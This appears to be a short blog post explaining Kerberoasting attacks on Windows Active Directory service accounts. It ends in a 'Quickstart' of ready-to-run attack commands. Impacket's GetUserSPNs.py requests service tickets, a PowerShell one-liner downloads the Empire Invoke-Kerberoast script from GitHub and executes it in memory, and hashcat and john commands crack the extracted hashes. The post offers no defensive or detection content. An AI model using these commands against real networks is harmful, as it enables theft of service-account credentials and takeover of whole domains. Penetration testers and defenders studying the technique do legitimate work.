Hello Stackers, Kerberoasting is a cyber attack targeting the Kerberos authentication protocol, commonly used in Windows networks to securely authenticate users and devices. In a Kerberoasting attack, an attacker uses specialized tools to extract encrypted Kerberos tickets from a network and then attempts to crack the encryption to gain access to sensitive information or network resources.
Before digging deeper into Kerberoasting attacks and how they work, one should understand the architecture of service accounts.
- Service account passwords are the same length and do not expire.
- Most service accounts have elevated permission and are often members of highly privileged groups like Domain Admins providing full admin rights to AD.
- Cracking the service account passwords enables attackers to exploit the Kerberos mechanism and compromise the entire AD domain.
Kerberos is an authentication protocol commonly used in Windows networks to securely authenticate users and devices. The Kerberos protocol uses tickets to securely authenticate users and devices without transmitting plaintext passwords over the network. These tickets are encrypted using a secret key shared between the user and the authentication server. In a Kerberoasting attack, the attacker can extract these encrypted tickets from the network and then use brute-force or dictionary-based attacks to try and crack the encryption and gain access to the sensitive information or resources that the ticket grants access to.
Quickstart
With Impacket example GetUserSPNs.py:
python GetUserSPNs.py <domain_name>/<domain_user>:<domain_user_password> -outputfile <output_TGSs_file>With Powershell:
iex (new-object Net.WebClient).DownloadString("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1")
Invoke-Kerberoast -OutputFormat <TGSs_format [hashcat | john]> | % { $_.Hash } | Out-File -Encoding ASCII <output_TGSs_file>Cracking with dictionary of passwords:
hashcat -m 13100 --force <TGSs_file> <passwords_file>
john --format=krb5tgs --wordlist=<passwords_file> <AS_REP_responses_file>Okay that’s All, see you later..
